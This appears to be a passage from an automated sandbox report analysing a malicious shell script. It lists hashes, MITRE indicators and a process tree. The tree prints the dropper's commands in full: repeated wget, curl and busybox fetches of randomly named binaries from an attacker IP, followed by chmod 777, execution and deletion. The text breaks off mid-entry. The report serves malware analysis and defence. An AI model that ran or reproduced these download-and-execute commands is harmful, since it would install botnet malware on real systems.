c0cb0d90ee7ff4503eb0a9f9cbca50981a86f477a499f920243ac6bb263bbfa1

Analysis

max time kernel
6s
max time network
131s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240729-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240729-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
21-11-2024 08:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c0cb0d90ee7ff4503eb0a9f9cbca50981a86f477a499f920243ac6bb263bbfa1.sh
Size

10KB
MD5

bb029aab8a7891c04069f60088312995
SHA1

515224677ec506e44a6d344ff8edf84789fc08ea
SHA256

c0cb0d90ee7ff4503eb0a9f9cbca50981a86f477a499f920243ac6bb263bbfa1
SHA512

dd9af47bb73cbc6d79efb7139d78732d532d3acb06629a8834f98e836aa5cbd249409043331509946caf2469f9959bd3e481e7bfa1a30cb3575e283a17617356
SSDEEP

192:mI4f7nvXhnvXhnvX4ZX374oMaXDPHRHRHc9ZG8I4V7COtG6Lhh99lnzvXu76Gksx:ATv9v9vwHowBBc9Z9nW5K7WG56q2ne7K

Score

7^/10

defense_evasion

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 28 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

Processes:

chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmod

pid	process
1657	chmod
1663	chmod
1615	chmod
1621	chmod
1627	chmod
1633	chmod
1645	chmod
1585	chmod
1675	chmod
1549	chmod
1579	chmod
1537	chmod
1561	chmod
1609	chmod
1651	chmod
1669	chmod
1525	chmod
1531	chmod
1555	chmod
1591	chmod
1597	chmod
1519	chmod
1543	chmod
1603	chmod
1573	chmod
1639	chmod
1510	chmod
1567	chmod

Executes dropped EXE 28 IoCs

Processes:

SdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJWvjQ4PJhevk47y44eHohAnAb7Lrnm0uNrWg0xAUqBtxYzscUUXZytllctNeDQXesIeHFKOt7JbZTdWhqii4VfudCKQMf3wiR7bRg93pRdiwWF36FzNlM2CWBEp5isVd7a7pyBY8mmyuFnig7SLqukn75LnZmw06l61kE18cmyJUD1qtKRE5wwnGVPAOrulQay4Y4Sih3LVMLX5UsXnRC524zBEEk2TH0apfry8KrElbTlAHcy16I181L2h0oyuVrDTAgDwzqfZfDRTV4ObuMon2AQgX5XM3RlLtlmmqFNwKnUC5umrYHm0qkmEeSETJT3lfayqj1qeJHoFDFLEeTxWIDMTO89nQhutuNGmdj2quGbJ7FuEeaW0rfmUXsqlAftc2z6t2oI5KlHGpyQ1KCL47jvKB2adoRmT7A3D3lUQ4D65uW54MCsodafV6WIDMTO89nQhutuNGmdj2quGbJ7FuEeaW0rbuMon2AQgX5XM3RlLtlmmqFNwKnUC5umrYHm0qkmEeSETJT3lfayqj1qeJHoFDFLEeTxfmUXsqlAftc2z6t2oI5KlHGpyQ1KCL47jvKB2adoRmT7A3D3lUQ4D65uW54MCsodafV60xAUqBtxYzscUUXZytllctNeDQXesIeHFKSdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJWvjQ4PJhevk47y44eHohAnAb7Lrnm0uNrWgyuFnig7SLqukn75LnZmw06l61kE18cmyJUD1qtKRE5wwnGVPAOrulQay4Y4Sih3LVMLX5UsXnRC524zBEEk2TH0apfry8KrElbTlAHcy16I181L2h0oyuVrDTAgDwzqfZfDRTV4OOt7JbZTdWhqii4VfudCKQMf3wiR7bRg93pRdiwWF36FzNlM2CWBEp5isVd7a7pyBY8mm

Writes file to tmp directory 28 IoCs

Malware often drops required files in the /tmp directory.

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for modification	/tmp/0xAUqBtxYzscUUXZytllctNeDQXesIeHFK	curl
File opened for modification	/tmp/Hm0qkmEeSETJT3lfayqj1qeJHoFDFLEeTx	curl
File opened for modification	/tmp/buMon2AQgX5XM3RlLtlmmqFNwKnUC5umrY	curl
File opened for modification	/tmp/vjQ4PJhevk47y44eHohAnAb7Lrnm0uNrWg	curl
File opened for modification	/tmp/cy16I181L2h0oyuVrDTAgDwzqfZfDRTV4O	curl
File opened for modification	/tmp/0xAUqBtxYzscUUXZytllctNeDQXesIeHFK	curl
File opened for modification	/tmp/yuFnig7SLqukn75LnZmw06l61kE18cmyJU	curl
File opened for modification	/tmp/D1qtKRE5wwnGVPAOrulQay4Y4Sih3LVMLX	curl
File opened for modification	/tmp/KB2adoRmT7A3D3lUQ4D65uW54MCsodafV6	curl
File opened for modification	/tmp/Hm0qkmEeSETJT3lfayqj1qeJHoFDFLEeTx	curl
File opened for modification	/tmp/SdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJW	curl
File opened for modification	/tmp/vjQ4PJhevk47y44eHohAnAb7Lrnm0uNrWg	curl
File opened for modification	/tmp/WIDMTO89nQhutuNGmdj2quGbJ7FuEeaW0r	curl
File opened for modification	/tmp/fmUXsqlAftc2z6t2oI5KlHGpyQ1KCL47jv	curl
File opened for modification	/tmp/Ot7JbZTdWhqii4VfudCKQMf3wiR7bRg93p	curl
File opened for modification	/tmp/5UsXnRC524zBEEk2TH0apfry8KrElbTlAH	curl
File opened for modification	/tmp/cy16I181L2h0oyuVrDTAgDwzqfZfDRTV4O	curl
File opened for modification	/tmp/D1qtKRE5wwnGVPAOrulQay4Y4Sih3LVMLX	curl
File opened for modification	/tmp/5UsXnRC524zBEEk2TH0apfry8KrElbTlAH	curl
File opened for modification	/tmp/RdiwWF36FzNlM2CWBEp5isVd7a7pyBY8mm	curl
File opened for modification	/tmp/KB2adoRmT7A3D3lUQ4D65uW54MCsodafV6	curl
File opened for modification	/tmp/Ot7JbZTdWhqii4VfudCKQMf3wiR7bRg93p	curl
File opened for modification	/tmp/fmUXsqlAftc2z6t2oI5KlHGpyQ1KCL47jv	curl
File opened for modification	/tmp/SdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJW	curl
File opened for modification	/tmp/buMon2AQgX5XM3RlLtlmmqFNwKnUC5umrY	curl
File opened for modification	/tmp/yuFnig7SLqukn75LnZmw06l61kE18cmyJU	curl
File opened for modification	/tmp/RdiwWF36FzNlM2CWBEp5isVd7a7pyBY8mm	curl
File opened for modification	/tmp/WIDMTO89nQhutuNGmdj2quGbJ7FuEeaW0r	curl

/tmp/c0cb0d90ee7ff4503eb0a9f9cbca50981a86f477a499f920243ac6bb263bbfa1.sh
/tmp/c0cb0d90ee7ff4503eb0a9f9cbca50981a86f477a499f920243ac6bb263bbfa1.sh
1⤵
PID:1505
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:1506
- /usr/bin/wget
  wget http://87.120.125.191/bins/SdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJW
  2⤵
  PID:1507
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/SdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJW
  2⤵
  - Writes file to tmp directory
  PID:1508
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/SdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJW
  2⤵
  PID:1509
- /bin/chmod
  chmod 777 SdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJW
  2⤵
  - File and Directory Permissions Modification
  PID:1510
- /tmp/SdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJW
  ./SdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJW
  2⤵
  - Executes dropped EXE
  PID:1511
- /bin/rm
  rm SdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJW
  2⤵
  PID:1512
- /usr/bin/wget
  wget http://87.120.125.191/bins/vjQ4PJhevk47y44eHohAnAb7Lrnm0uNrWg
  2⤵
  PID:1513
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/vjQ4PJhevk47y44eHohAnAb7Lrnm0uNrWg
  2⤵
  - Writes file to tmp directory
  PID:1517
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/vjQ4PJhevk47y44eHohAnAb7Lrnm0uNrWg
  2⤵
  PID:1518
- /bin/chmod
  chmod 777 vjQ4PJhevk47y44eHohAnAb7Lrnm0uNrWg
  2⤵
  - File and Directory Permissions Modification
  PID:1519
- /tmp/vjQ4PJhevk47y44eHohAnAb7Lrnm0uNrWg
  ./vjQ4PJhevk47y44eHohAnAb7Lrnm0uNrWg
  2⤵
  - Executes dropped EXE
  PID:1520
- /bin/rm
  rm vjQ4PJhevk47y44eHohAnAb7Lrnm0uNrWg
  2⤵
  PID:1521
- /usr/bin/wget
  wget http://87.120.125.191/bins/0xAUqBtxYzscUUXZytllctNeDQXesIeHFK
  2⤵
  PID:1522
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/0xAUqBtxYzscUUXZytllctNeDQXesIeHFK
  2⤵
  - Writes file to tmp directory
  PID:1523
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/0xAUqBtxYzscUUXZytllctNeDQXesIeHFK
  2⤵
  PID:1524
- /bin/chmod
  chmod 777 0xAUqBtxYzscUUXZytllctNeDQXesIeHFK
  2⤵
  - File and Directory Permissions Modification
  PID:1525
- /tmp/0xAUqBtxYzscUUXZytllctNeDQXesIeHFK
  ./0xAUqBtxYzscUUXZytllctNeDQXesIeHFK
  2⤵
  - Executes dropped EXE
  PID:1526
- /bin/rm
  rm 0xAUqBtxYzscUUXZytllctNeDQXesIeHFK
  2⤵
  PID:1527
- /usr/bin/wget
  wget http://87.120.125.191/bins/Ot7JbZTdWhqii4VfudCKQMf3wiR7bRg93p
  2⤵
  PID:1528
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/Ot7JbZTdWhqii4VfudCKQMf3wiR7bRg93p
  2⤵
  - Writes file to tmp directory
  PID:1529
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/Ot7JbZTdWhqii4VfudCKQMf3wiR7bRg93p
  2⤵
  PID:1530
- /bin/chmod
  chmod 777 Ot7JbZTdWhqii4VfudCKQMf3wiR7bRg93p
  2⤵
  - File and Directory Permissions Modification
  PID:1531
- /tmp/Ot7JbZTdWhqii4VfudCKQMf3wiR7bRg93p
  ./Ot7JbZTdWhqii4VfudCKQMf3wiR7bRg93p
  2⤵
  - Executes dropped EXE
  PID:1532
- /bin/rm
  rm Ot7JbZTdWhqii4VfudCKQMf3wiR7bRg93p
  2⤵
  PID:1533
- /usr/bin/wget
  wget http://87.120.125.191/bins/RdiwWF36FzNlM2CWBEp5isVd7a7pyBY8mm
  2⤵
  PID:1534
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/RdiwWF36FzNlM2CWBEp5isVd7a7pyBY8mm
  2⤵
  - Writes file to tmp directory
  PID:1535
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/RdiwWF36FzNlM2CWBEp5isVd7a7pyBY8mm
  2⤵
  PID:1536
- /bin/chmod
  chmod 777 RdiwWF36FzNlM2CWBEp5isVd7a7pyBY8mm
  2⤵
  - File and Directory Permissions Modification
  PID:1537
- /tmp/RdiwWF36FzNlM2CWBEp5isVd7a7pyBY8mm
  ./RdiwWF36FzNlM2CWBEp5isVd7a7pyBY8mm
  2⤵
  - Executes dropped EXE
  PID:1538
- /bin/rm
  rm RdiwWF36FzNlM2CWBEp5isVd7a7pyBY8mm
  2⤵
  PID:1539
- /usr/bin/wget
  wget http://87.120.125.191/bins/yuFnig7SLqukn75LnZmw06l61kE18cmyJU
  2⤵
  PID:1540
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/yuFnig7SLqukn75LnZmw06l61kE18cmyJU
  2⤵
  - Writes file to tmp directory
  PID:1541
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/yuFnig7SLqukn75LnZmw06l61kE18cmyJU
  2⤵
  PID:1542
- /bin/chmod
  chmod 777 yuFnig7SLqukn75LnZmw06l61kE18cmyJU
  2⤵
  - File and Directory Permissions Modification
  PID:1543
- /tmp/yuFnig7SLqukn75LnZmw06l61kE18cmyJU
  ./yuFnig7SLqukn75LnZmw06l61kE18cmyJU
  2⤵
  - Executes dropped EXE
  PID:1544
- /bin/rm
  rm yuFnig7SLqukn75LnZmw06l61kE18cmyJU
  2⤵
  PID:1545
- /usr/bin/wget
  wget http://87.120.125.191/bins/D1qtKRE5wwnGVPAOrulQay4Y4Sih3LVMLX
  2⤵
  PID:1546
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/D1qtKRE5wwnGVPAOrulQay4Y4Sih3LVMLX
  2⤵
  - Writes file to tmp directory
  PID:1547
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/D1qtKRE5wwnGVPAOrulQay4Y4Sih3LVMLX
  2⤵
  PID:1548
- /bin/chmod
  chmod 777 D1qtKRE5wwnGVPAOrulQay4Y4Sih3LVMLX
  2⤵
  - File and Directory Permissions Modification
  PID:1549
- /tmp/D1qtKRE5wwnGVPAOrulQay4Y4Sih3LVMLX
  ./D1qtKRE5wwnGVPAOrulQay4Y4Sih3LVMLX
  2⤵
  - Executes dropped EXE
  PID:1550
- /bin/rm
  rm D1qtKRE5wwnGVPAOrulQay4Y4Sih3LVMLX
  2⤵
  PID:1551
- /usr/bin/wget
  wget http://87.120.125.191/bins/5UsXnRC524zBEEk2TH0apfry8KrElbTlAH
  2⤵
  PID:1552
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/5UsXnRC524zBEEk2TH0apfry8KrElbTlAH
  2⤵
  - Writes file to tmp directory
  PID:1553
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/5UsXnRC524zBEEk2TH0apfry8KrElbTlAH
  2⤵
  PID:1554
- /bin/chmod
  chmod 777 5UsXnRC524zBEEk2TH0apfry8KrElbTlAH
  2⤵
  - File and Directory Permissions Modification
  PID:1555
- /tmp/5UsXnRC524zBEEk2TH0apfry8KrElbTlAH
  ./5UsXnRC524zBEEk2TH0apfry8KrElbTlAH
  2⤵
  - Executes dropped EXE
  PID:1556
- /bin/rm
  rm 5UsXnRC524zBEEk2TH0apfry8KrElbTlAH
  2⤵
  PID:1557
- /usr/bin/wget
  wget http://87.120.125.191/bins/cy16I181L2h0oyuVrDTAgDwzqfZfDRTV4O
  2⤵
  PID:1558
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/cy16I181L2h0oyuVrDTAgDwzqfZfDRTV4O
  2⤵
  - Writes file to tmp directory
  PID:1559
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/cy16I181L2h0oyuVrDTAgDwzqfZfDRTV4O
  2⤵
  PID:1560
- /bin/chmod
  chmod 777 cy16I181L2h0oyuVrDTAgDwzqfZfDRTV4O
  2⤵
  - File and Directory Permissions Modification
  PID:1561
- /tmp/cy16I181L2h0oyuVrDTAgDwzqfZfDRTV4O
  ./cy16I181L2h0oyuVrDTAgDwzqfZfDRTV4O
  2⤵
  - Executes dropped EXE
  PID:1562
- /bin/rm
  rm cy16I181L2h0oyuVrDTAgDwzqfZfDRTV4O
  2⤵
  PID:1563
- /usr/bin/wget
  wget http://87.120.125.191/bins/buMon2AQgX5XM3RlLtlmmqFNwKnUC5umrY
  2⤵
  PID:1564
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/buMon2AQgX5XM3RlLtlmmqFNwKnUC5umrY
  2⤵
  - Writes file to tmp directory
  PID:1565
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/buMon2AQgX5XM3RlLtlmmqFNwKnUC5umrY
  2⤵
  PID:1566
- /bin/chmod
  chmod 777 buMon2AQgX5XM3RlLtlmmqFNwKnUC5umrY
  2⤵
  - File and Directory Permissions Modification
  PID:1567
- /tmp/buMon2AQgX5XM3RlLtlmmqFNwKnUC5umrY
  ./buMon2AQgX5XM3RlLtlmmqFNwKnUC5umrY
  2⤵
  - Executes dropped EXE
  PID:1568
- /bin/rm
  rm buMon2AQgX5XM3RlLtlmmqFNwKnUC5umrY
  2⤵
  PID:1569
- /usr/bin/wget
  wget http://87.120.125.191/bins/Hm0qkmEeSETJT3lfayqj1qeJHoFDFLEeTx
  2⤵
  PID:1570
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/Hm0qkmEeSETJT3lfayqj1qeJHoFDFLEeTx
  2⤵
  - Writes file to tmp directory
  PID:1571
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/Hm0qkmEeSETJT3lfayqj1qeJHoFDFLEeTx
  2⤵
  PID:1572
- /bin/chmod
  chmod 777 Hm0qkmEeSETJT3lfayqj1qeJHoFDFLEeTx
  2⤵
  - File and Directory Permissions Modification
  PID:1573
- /tmp/Hm0qkmEeSETJT3lfayqj1qeJHoFDFLEeTx
  ./Hm0qkmEeSETJT3lfayqj1qeJHoFDFLEeTx
  2⤵
  - Executes dropped EXE
  PID:1574
- /bin/rm
  rm Hm0qkmEeSETJT3lfayqj1qeJHoFDFLEeTx
  2⤵
  PID:1575
- /usr/bin/wget
  wget http://87.120.125.191/bins/WIDMTO89nQhutuNGmdj2quGbJ7FuEeaW0r
  2⤵
  PID:1576
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/WIDMTO89nQhutuNGmdj2quGbJ7FuEeaW0r
  2⤵
  - Writes file to tmp directory
  PID:1577
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/WIDMTO89nQhutuNGmdj2quGbJ7FuEeaW0r
  2⤵
  PID:1578
- /bin/chmod
  chmod 777 WIDMTO89nQhutuNGmdj2quGbJ7FuEeaW0r
  2⤵
  - File and Directory Permissions Modification
  PID:1579
- /tmp/WIDMTO89nQhutuNGmdj2quGbJ7FuEeaW0r
  ./WIDMTO89nQhutuNGmdj2quGbJ7FuEeaW0r
  2⤵
  - Executes dropped EXE
  PID:1580
- /bin/rm
  rm WIDMTO89nQhutuNGmdj2quGbJ7FuEeaW0r
  2⤵
  PID:1581
- /usr/bin/wget
  wget http://87.120.125.191/bins/fmUXsqlAftc2z6t2oI5KlHGpyQ1KCL47jv
  2⤵
  PID:1582
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/fmUXsqlAftc2z6t2oI5KlHGpyQ1KCL47jv
  2⤵
  - Writes file to tmp directory
  PID:1583
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/fmUXsqlAftc2z6t2oI5KlHGpyQ1KCL47jv
  2⤵
  PID:1584
- /bin/chmod
  chmod 777 fmUXsqlAftc2z6t2oI5KlHGpyQ1KCL47jv
  2⤵
  - File and Directory Permissions Modification
  PID:1585
- /tmp/fmUXsqlAftc2z6t2oI5KlHGpyQ1KCL47jv
  ./fmUXsqlAftc2z6t2oI5KlHGpyQ1KCL47jv
  2⤵
  - Executes dropped EXE
  PID:1586
- /bin/rm
  rm fmUXsqlAftc2z6t2oI5KlHGpyQ1KCL47jv
  2⤵
  PID:1587
- /usr/bin/wget
  wget http://87.120.125.191/bins/KB2adoRmT7A3D3lUQ4D65uW54MCsodafV6
  2⤵
  PID:1588
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/KB2adoRmT7A3D3lUQ4D65uW54MCsodafV6
  2⤵
  - Writes file to tmp directory
  PID:1589
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/KB2adoRmT7A3D3lUQ4D65uW54MCsodafV6
  2⤵
  PID:1590
- /bin/chmod
  chmod 777 KB2adoRmT7A3D3lUQ4D65uW54MCsodafV6
  2⤵
  - File and Directory Permissions Modification
  PID:1591
- /tmp/KB2adoRmT7A3D3lUQ4D65uW54MCsodafV6
  ./KB2adoRmT7A3D3lUQ4D65uW54MCsodafV6
  2⤵
  - Executes dropped EXE
  PID:1592
- /bin/rm
  rm KB2adoRmT7A3D3lUQ4D65uW54MCsodafV6
  2⤵
  PID:1593
- /usr/bin/wget
  wget http://87.120.125.191/bins/WIDMTO89nQhutuNGmdj2quGbJ7FuEeaW0r
  2⤵
  PID:1594
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/WIDMTO89nQhutuNGmdj2quGbJ7FuEeaW0r
  2⤵
  - Writes file to tmp directory
  PID:1595
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/WIDMTO89nQhutuNGmdj2quGbJ7FuEeaW0r
  2⤵
  PID:1596
- /bin/chmod
  chmod 777 WIDMTO89nQhutuNGmdj2quGbJ7FuEeaW0r
  2⤵
  - File and Directory Permissions Modification
  PID:1597
- /tmp/WIDMTO89nQhutuNGmdj2quGbJ7FuEeaW0r
  ./WIDMTO89nQhutuNGmdj2quGbJ7FuEeaW0r
  2⤵
  - Executes dropped EXE
  PID:1598
- /bin/rm
  rm WIDMTO89nQhutuNGmdj2quGbJ7FuEeaW0r
  2⤵
  PID:1599
- /usr/bin/wget
  wget http://87.120.125.191/bins/buMon2AQgX5XM3RlLtlmmqFNwKnUC5umrY
  2⤵
  PID:1600
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/buMon2AQgX5XM3RlLtlmmqFNwKnUC5umrY
  2⤵
  - Writes file to tmp directory
  PID:1601
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/buMon2AQgX5XM3RlLtlmmqFNwKnUC5umrY
  2⤵
  PID:1602
- /bin/chmod
  chmod 777 buMon2AQgX5XM3RlLtlmmqFNwKnUC5umrY
  2⤵
  - File and Directory Permissions Modification
  PID:1603
- /tmp/buMon2AQgX5XM3RlLtlmmqFNwKnUC5umrY
  ./buMon2AQgX5XM3RlLtlmmqFNwKnUC5umrY
  2⤵
  - Executes dropped EXE
  PID:1604
- /bin/rm
  rm buMon2AQgX5XM3RlLtlmmqFNwKnUC5umrY
  2⤵
  PID:1605
- /usr/bin/wget
  wget http://87.120.125.191/bins/Hm0qkmEeSETJT3lfayqj1qeJHoFDFLEeTx
  2⤵
  PID:1606
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/Hm0qkmEeSETJT3lfayqj1qeJHoFDFLEeTx
  2⤵
  - Writes file to tmp directory
  PID:1607
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/Hm0qkmEeSETJT3lfayqj1qeJHoFDFLEeTx
  2⤵
  PID:1608
- /bin/chmod
  chmod 777 Hm0qkmEeSETJT3lfayqj1qeJHoFDFLEeTx
  2⤵
  - File and Directory Permissions Modification
  PID:1609
- /tmp/Hm0qkmEeSETJT3lfayqj1qeJHoFDFLEeTx
  ./Hm0qkmEeSETJT3lfayqj1qeJHoFDFLEeTx
  2⤵
  - Executes dropped EXE
  PID:1610
- /bin/rm
  rm Hm0qkmEeSETJT3lfayqj1qeJHoFDFLEeTx
  2⤵
  PID:1611
- /usr/bin/wget
  wget http://87.120.125.191/bins/fmUXsqlAftc2z6t2oI5KlHGpyQ1KCL47jv
  2⤵
  PID:1612
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/fmUXsqlAftc2z6t2oI5KlHGpyQ1KCL47jv
  2⤵
  - Writes file to tmp directory
  PID:1613
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/fmUXsqlAftc2z6t2oI5KlHGpyQ1KCL47jv
  2⤵
  PID:1614
- /bin/chmod
  chmod 777 fmUXsqlAftc2z6t2oI5KlHGpyQ1KCL47jv
  2⤵
  - File and Directory Permissions Modification
  PID:1615
- /tmp/fmUXsqlAftc2z6t2oI5KlHGpyQ1KCL47jv
  ./fmUXsqlAftc2z6t2oI5KlHGpyQ1KCL47jv
  2⤵
  - Executes dropped EXE
  PID:1616
- /bin/rm
  rm fmUXsqlAftc2z6t2oI5KlHGpyQ1KCL47jv
  2⤵
  PID:1617
- /usr/bin/wget
  wget http://87.120.125.191/bins/KB2adoRmT7A3D3lUQ4D65uW54MCsodafV6
  2⤵
  PID:1618
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/KB2adoRmT7A3D3lUQ4D65uW54MCsodafV6
  2⤵
  - Writes file to tmp directory
  PID:1619
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/KB2adoRmT7A3D3lUQ4D65uW54MCsodafV6
  2⤵
  PID:1620
- /bin/chmod
  chmod 777 KB2adoRmT7A3D3lUQ4D65uW54MCsodafV6
  2⤵
  - File and Directory Permissions Modification
  PID:1621
- /tmp/KB2adoRmT7A3D3lUQ4D65uW54MCsodafV6
  ./KB2adoRmT7A3D3lUQ4D65uW54MCsodafV6
  2⤵
  - Executes dropped EXE
  PID:1622
- /bin/rm
  rm KB2adoRmT7A3D3lUQ4D65uW54MCsodafV6
  2⤵
  PID:1623
- /usr/bin/wget
  wget http://87.120.125.191/bins/0xAUqBtxYzscUUXZytllctNeDQXesIeHFK
  2⤵
  PID:1624
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/0xAUqBtxYzscUUXZytllctNeDQXesIeHFK
  2⤵
  - Writes file to tmp directory
  PID:1625
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/0xAUqBtxYzscUUXZytllctNeDQXesIeHFK
  2⤵
  PID:1626
- /bin/chmod
  chmod 777 0xAUqBtxYzscUUXZytllctNeDQXesIeHFK
  2⤵
  - File and Directory Permissions Modification
  PID:1627
- /tmp/0xAUqBtxYzscUUXZytllctNeDQXesIeHFK
  ./0xAUqBtxYzscUUXZytllctNeDQXesIeHFK
  2⤵
  - Executes dropped EXE
  PID:1628
- /bin/rm
  rm 0xAUqBtxYzscUUXZytllctNeDQXesIeHFK
  2⤵
  PID:1629
- /usr/bin/wget
  wget http://87.120.125.191/bins/SdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJW
  2⤵
  PID:1630
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/SdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJW
  2⤵
  - Writes file to tmp directory
  PID:1631
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/SdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJW
  2⤵
  PID:1632
- /bin/chmod
  chmod 777 SdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJW
  2⤵
  - File and Directory Permissions Modification
  PID:1633
- /tmp/SdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJW
  ./SdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJW
  2⤵
  - Executes dropped EXE
  PID:1634
- /bin/rm
  rm SdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJW
  2⤵
  PID:1635
- /usr/bin/wget
  wget http://87.120.125.191/bins/vjQ4PJhevk47y44eHohAnAb7Lrnm0uNrWg
  2⤵
  PID:1636
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/vjQ4PJhevk47y44eHohAnAb7Lrnm0uNrWg
  2⤵
  - Writes file to tmp directory
  PID:1637
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/vjQ4PJhevk47y44eHohAnAb7Lrnm0uNrWg
  2⤵
  PID:1638
- /bin/chmod
  chmod 777 vjQ4PJhevk47y44eHohAnAb7Lrnm0uNrWg
  2⤵
  - File and Directory Permissions Modification
  PID:1639
- /tmp/vjQ4PJhevk47y44eHohAnAb7Lrnm0uNrWg
  ./vjQ4PJhevk47y44eHohAnAb7Lrnm0uNrWg
  2⤵
  - Executes dropped EXE
  PID:1640
- /bin/rm
  rm vjQ4PJhevk47y44eHohAnAb7Lrnm0uNrWg
  2⤵
  PID:1641
- /usr/bin/wget
  wget http://87.120.125.191/bins/yuFnig7SLqukn75LnZmw06l61kE18cmyJU
  2⤵
  PID:1642
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/yuFnig7SLqukn75LnZmw06l61kE18cmyJU
  2⤵
  - Writes file to tmp directory
  PID:1643
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/yuFnig7SLqukn75LnZmw06l61kE18cmyJU
  2⤵
  PID:1644
- /bin/chmod
  chmod 777 yuFnig7SLqukn75LnZmw06l61kE18cmyJU
  2⤵
  - File and Directory Permissions Modification
  PID:1645
- /tmp/yuFnig7SLqukn75LnZmw06l61kE18cmyJU
  ./yuFnig7SLqukn75LnZmw06l61kE18cmyJU
  2⤵
  - Executes dropped EXE
  PID:1646
- /bin/rm
  rm yuFnig7SLqukn75LnZmw06l61kE18cmyJU
  2⤵
  PID:1647
- /usr/bin/wget
  wget http://87.120.125.191/bins/D1qtKRE5wwnGVPAOrulQay4Y4Sih3LVMLX
  2⤵
  PID:1648
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/D1qtKRE5wwnGVPAOrulQay4Y4Sih3LVMLX
  2⤵
  - Writes file to tmp directory
  PID:1649
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/D1qtKRE5wwnGVPAOrulQay4Y4Sih3LVMLX
  2⤵
  PID:1650
- /bin/chmod
  chmod 777 D1qtKRE5wwnGVPAOrulQay4Y4Sih3LVMLX
  2⤵
  - File and Directory Permissions Modification
  PID:1651
- /tmp/D1qtKRE5wwnGVPAOrulQay4Y4Sih3LVMLX
  ./D1qtKRE5wwnGVPAOrulQay4Y4Sih3LVMLX
  2⤵
  - Executes dropped EXE
  PID:1652
- /bin/rm
  rm D1qtKRE5wwnGVPAOrulQay4Y4Sih3LVMLX
  2⤵
  PID:1653
- /usr/bin/wget
  wget http://87.120.125.191/bins/5UsXnRC524zBEEk2TH0apfry8KrElbTlAH
  2⤵
  PID:1654
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/5UsXnRC524zBEEk2TH0apfry8KrElbTlAH
  2⤵
  - Writes file to tmp directory
  PID:1655
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/5UsXnRC524zBEEk2TH0apfry8KrElbTlAH
  2⤵
  PID:1656
- /bin/chmod
  chmod 777 5UsXnRC524zBEEk2TH0apfry8KrElbTlAH
  2⤵
